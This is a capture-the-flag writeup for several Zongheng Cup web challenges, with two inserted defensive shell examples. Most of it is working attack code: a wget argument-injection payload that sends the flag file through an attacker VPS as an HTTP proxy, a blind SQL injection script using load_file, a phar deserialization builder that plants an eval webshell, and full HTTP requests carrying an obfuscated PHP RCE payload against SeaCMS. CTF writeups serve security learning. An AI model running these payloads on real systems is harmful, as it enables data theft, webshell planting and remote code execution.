Zongheng Cup Network Security Competition Writeup

magic_download

run.sh

#!/bin/bash
ulimit -c 0       # core dump size (KB)
ulimit -t 60      # max CPU time (s)
ulimit -u 1500    # max number of processes
ulimit -m 512000  # max memory (KB)

cd /home/ctf
stdbuf -oL echo -n "Please enter your IP:"
read IP
echo $IP|grep "^[0-9\.]\{7,15\}$" > /dev/null
if [ $? -ne 0 ]
then
    stdbuf -oL echo "Please input a IP!"
else
    exec /home/ctf/wget -P /tmp $IP
fi

This regular expression can be bypassed with a newline (see the demonstration). The script itself makes this possible: $IP is expanded unquoted into echo, so an input that begins with -e is taken by echo as the option that enables backslash escapes, its \n becomes a real newline (it is typed as \\n because read without -r strips one backslash), grep matches the 127.0.0.1 on the second line, and exec wget ... $IP then receives every word of the input as a separate argument. The same -e is also wget's option for executing a .wgetrc command, which is how http_proxy gets set:

Then use wget's own options to carry the flag out. wget honours http_proxy, so set the proxy to the attacker's VPS through -e, listen on port 80 there, and the flag arrives as the body of the proxied POST. That's it.

-e http_proxy=vps --method=POST --body-file=/home/ctf/flag --header=X-Powered-By:Y1ng \\n127.0.0.1
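The original check beside a hardened one, as an added example that is not part of the writeup or the challenge; attacker.example stands in for the VPS and the function names are my own.

```shell
#!/bin/sh
# Added example (not the challenge's own run.sh): the original check side by side with a
# hardened one. The weak check fails because $IP is expanded unquoted into echo, so input
# that starts with -e is taken as an echo option and its \n escape becomes a real newline;
# grep then matches the trailing 127.0.0.1 line while wget receives every word as an argument.

# The original check, verbatim.
weak_ip_check() {
    echo $1 | grep "^[0-9\.]\{7,15\}$" > /dev/null
}

# Hardened check: reject embedded newlines outright, never let the value reach echo,
# and accept only four dotted decimal octets in 0-255 without leading zeros.
strict_ip_check() {
    nl=$(printf '\n_'); nl=${nl%_}
    case $1 in
        *"$nl"*) return 1 ;;
    esac
    octet='(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])'
    printf '%s\n' "$1" | grep -Eq "^($octet\.){3}${octet}\$"
}

# How the launcher should look: read -r keeps backslashes literal, the variable is quoted
# everywhere, and -- stops wget from treating the value as an option.
hardened_prompt() {
    printf 'Please enter your IP:'
    IFS= read -r IP
    if strict_ip_check "$IP"; then
        exec /home/ctf/wget -P /tmp -- "$IP"
    else
        printf 'Please input an IP!\n' >&2
        exit 1
    fi
}

# Constructed test input modelled on the payload above; attacker.example is a placeholder.
PAYLOAD='-e http_proxy=attacker.example --method=POST --body-file=/home/ctf/flag \n127.0.0.1'
if weak_ip_check "$PAYLOAD"; then echo "weak check:   accepted the payload"; fi
if strict_ip_check "$PAYLOAD"; then :; else echo "strict check: rejected the payload"; fi
```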

easyci

The login form responds differently depending on whether the username exists, which gives a boolean blind SQL injection; with it you can load_file() to read the Apache site configuration and get the web root of the site.

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com

import requests
import time
from urllib.parse import quote
from base64 import b64decode

url = "http://your_docker.cloudeci1.ichunqiu.com/public/index.php/home/login"
data = {"username": "", "password": "y1ng"}
result = ""

# The payloads were used one after another; the last assignment is the one that runs.
payload = 'select database()'
payload = 'password'  # c3762483bc73d0b7943156d43911ce38
payload = 'select to_base64(substr((load_file("/etc/apache2/sites-enabled/000-default.conf")),596,650))'  # /var/sercet/html, then sqlmap's os-shell finishes it

for i in range(1, 10000):
    time.sleep(0.06)
    # Binary search for the ASCII code of character i of the payload's result.
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        data["username"] = "0'or (ascii(substr((%s),%d,1)))>%d#" % (payload, i, mid)
        # print(data)
        r = requests.post(url, data)
        # print(r.text)
        # The response mentions "用户名" (username) only when the username lookup
        # returns no row, i.e. when the injected condition is false.
        if "用户名" not in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if mid == 32 or mid == 127:
        break  # no printable character left: end of the result
    result += chr(mid)
    print(result)
    try:
        # The third payload returns base64, so also show the decoded text.
        print(b64decode(result.encode()).decode())
    except Exception:
        pass

The web root is /var/sercet/html; from there sqlmap's --os-shell finishes the job.


easycms

Get the source code from www.zip; config.php gives the database account and password admin/admin868, and the same password also gets you into the backend.

Then read /flag with this SSRF issue: https://github.com/yzmcms/yzmcms/issues/53


hello php

Get the source code from www.zip; it is a simple phar deserialization.

<?php
// Builds the malicious phar: the object stored as metadata is what gets
// deserialized when index.php opens the file through phar://.
class Config{
    public $title;
    public $comment;
    public $logo_url;
    public function __construct($title,$comment,$logo_url){
        $this->title= $title;
        $this->comment = $comment;
        $this->logo_url = $logo_url;
    }
}
// The title closes the string being written into config.php and appends the webshell.
$c = new Config("';echo('shell');eval(\$_POST['0']);//",'123','123');
@unlink("phar.jpg");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($c);                  // serialized Config goes into the manifest
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
@rename("phar.phar","phar.jpg");         // disguised as an image for the upload
?>

The uploaded file is renamed to the MD5 of the upload timestamp and nothing is echoed back, so write a script to find it:

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
import time
import requests as req
import hashlib

def md5(s):
    return hashlib.md5(s.encode()).hexdigest()

# The server names the upload md5(upload timestamp).jpg, so probe the static
# path once per second right after uploading until it answers 200.
for i in range(100):
    url = f"http://eci-2zeb3stdvqw9aed67js3.cloudeci1.ichunqiu.com/static/{md5(str(int(time.time())))}.jpg"
    r = req.get(url)
    if r.status_code == 200:
        print(url)
        break
    else:
        print(i, r.status_code)
    time.sleep(1)

index.php triggers the phar deserialization, which writes the webshell into config.php

/?img=phar:///var/www/html/static/67d9c71da5d4926c0f3433659c0690fd.jpg
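A server-side check an upload handler could run before storing the file, as an added example that is not part of the writeup or the challenge (function names and sample files are constructed): it refuses anything carrying the phar markers the archive above must contain, whatever its extension. The root fix is still not letting a user-supplied path such as ?img= reach a file function with the phar:// wrapper available.

```shell
#!/bin/sh
# Added example, not part of the challenge: a pre-storage check for an upload handler
# that only expects images. The phar built above has no image header at all, but a
# polyglot could carry one, so the check refuses any file that shows phar structure:
# the mandatory __HALT_COMPILER(); stub marker or the 4-byte "GBMB" magic that ends
# every signed phar. Returns 0 when the file must be rejected.
looks_like_phar() {
    grep -q '__HALT_COMPILER' "$1" && return 0
    [ "$(tail -c 4 "$1" 2>/dev/null)" = "GBMB" ]
}

# Returns 0 when the file starts with the JPEG SOI marker FF D8 FF.
has_jpeg_header() {
    [ "$(od -An -N3 -tx1 "$1" | tr -d ' \n')" = "ffd8ff" ]
}

# Accept only a JPEG that carries no phar structure.
upload_is_safe_jpeg() {
    has_jpeg_header "$1" && ! looks_like_phar "$1"
}

# Constructed samples: a stub like the one generated above, a plain JPEG header, and a
# polyglot that has the JPEG header but a phar trailer.
WORK=$(mktemp -d)
printf '<?php __HALT_COMPILER(); ?>\r\n' > "$WORK/phar.jpg"
printf '\377\330\377\340JFIF' > "$WORK/real.jpg"
printf '\377\330\377\340JFIF\nGBMB' > "$WORK/polyglot.jpg"
for f in phar.jpg real.jpg polyglot.jpg; do
    if upload_is_safe_jpeg "$WORK/$f"; then echo "$f: accept"; else echo "$f: reject"; fi
done
```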

Let’s review the code together

Reference https://www.freebuf.com/vuls/241106.html

Log in to the backend with admin/123456. Find adm1n/admin_weixin.php and use the non-alphanumeric RCE:

POST /adm1n/admin_weixin.php?action=set HTTP/1.1
Host: eci-2ze9eefnhrp2znd5q2ia.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1265
Connection: close
Referer: http://eci-2ze9eefnhrp2znd5q2ia.cloudeci1.ichunqiu.com/adm1n/admin_weixin.php
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1608027846,1608659573,1608962046; UM_distinctid=1745809b7eda-0b8fe367096bfd8-4c312d7d-1fa400-1745809b7ee40; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1608966210; __jsluid_h=82317a29492d0410972d5c3b5bb35543; PHPSESSID=9d513712218467c2e573a918f8b8d725; __tins__21018907=%7B%22sid%22%3A%201608966619441%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201608968423945%7D; __51cke__=; __51laig__=2
Upgrade-Insecure-Requests: 1

isopen=n&url=https%3A%2F%2Fwww.seacms.net&title=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86&ckmov_url=https%3A%2F%2Fwww.seacms.net%2Fvip.php%3Furl%3D+&dpic=https%3A%2F%2Fwww.seacms.net%2Fapi%2Fwx.jpg&follow=%E6%84%9F%E8%B0%A2%E6%82%A8%E7%9A%84%E5%85%B3%E6%B3%A8%E3%80%82&noc=%E6%9A%82%E6%97%A0%E4%BD%A0%E8%A6%81%E7%9A%84%E5%86%85%E5%AE%B9%E3%80%82&help=%E8%BF%99%E6%98%AF%E5%B8%AE%E5%8A%A9%E4%BF%A1%E6%81%AF%E3%80%82&topage=d&dwz=n&dwztoken=dwztoken&sql_num=15&msg1a=%E5%85%B3%E9%94%AE%E8%AF%8D1&msg1b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B91&msg2a=%E5%85%B3%E9%94%AE%E8%AF%8D2&msg2b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B92%3Ca+href%3D%27http%3A%2F%2Fwww.seacms.net%27%3E%E9%93%BE%E6%8E%A5%E6%B5%8B%E8%AF%95%3C%2Fa%3E%EF%BC%8C%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9D%9F%E3%80%82&msg3a=%E5%85%B3%E9%94%AE%E8%AF%8D3&msg3b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B93&msg4a=%E5%85%B3%E9%94%AE%E8%AF%8D4&msg4b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B94&msg5a=%E5%85%B3%E9%94%AE%E8%AF%8D5&msg5b=1231");$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);//

POST /data/admin/weixin.php HTTP/1.1
Host: eci-2ze9eefnhrp2znd5q2ia.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1608027846,1608659573,1608962046; UM_distinctid=1745809b7eda-0b8fe367096bfd8-4c312d7d-1fa400-1745809b7ee40; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1608966210; __jsluid_h=82317a29492d0410972d5c3b5bb35543; PHPSESSID=9d513712218467c2e573a918f8b8d725; __tins__21018907=%7B%22sid%22%3A%201608966619441%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201608968423945%7D; __51cke__=; __51laig__=2
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

_=system("cat /flag");


Origin blog.csdn.net/qq_45619909/article/details/128947257